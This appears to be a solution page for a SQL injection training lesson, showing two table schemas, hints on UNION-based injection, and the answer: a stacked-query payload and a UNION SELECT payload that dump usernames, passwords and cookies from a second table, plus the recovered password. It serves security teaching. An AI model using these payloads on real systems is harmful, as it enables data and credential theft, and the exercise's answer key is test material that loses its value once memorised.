SQL Injection Advanced (3)

Try It! Pulling data from other tables

The input field below is used to get data from a user by their last name. The table is called 'user_data':

CREATE TABLE user_data (userid int not null,
                        first_name varchar(20),
                        last_name varchar(20),
                        cc_number varchar(30),
                        cc_type varchar(10),
                        cookie varchar(20),
                        login_count int);

Through experimentation you found that this field is susceptible to SQL injection. Now you want to use that knowledge to get the contents of another table. The table you want to pull data from is:

CREATE TABLE user_system_data (userid int not null primary key,
			                   user_name varchar(12),
			                   password varchar(10),
			                   cookie varchar(30));

6.a) Retrieve all data from the table 6.b) When you have figured it out…​. What is Dave’s password?

Note: There are multiple ways to solve this Assignment. One is by using a UNION, the other by appending a new SQl statement. Maybe you can find both of them.


💡 Remember that when using an UNION each SELECT statement within UNION must have the same number of columns. 💡 The data type of a column in the first SELECT statement must have a similar data type to that in the second SELECT statement. 💡 Your new SQL query must end with a comment. eg: -- 💡 If a column needs a String you could substitute something like 'a String' for it. For integers you could substitute a 1.

  • Name: '; SELECT * FROM user_system_data;-- or ' UNION SELECT 1, user_name, password, cookie, 'A', 'B', 1 from user_system_data;--

  • Password: passW0rD

Last updated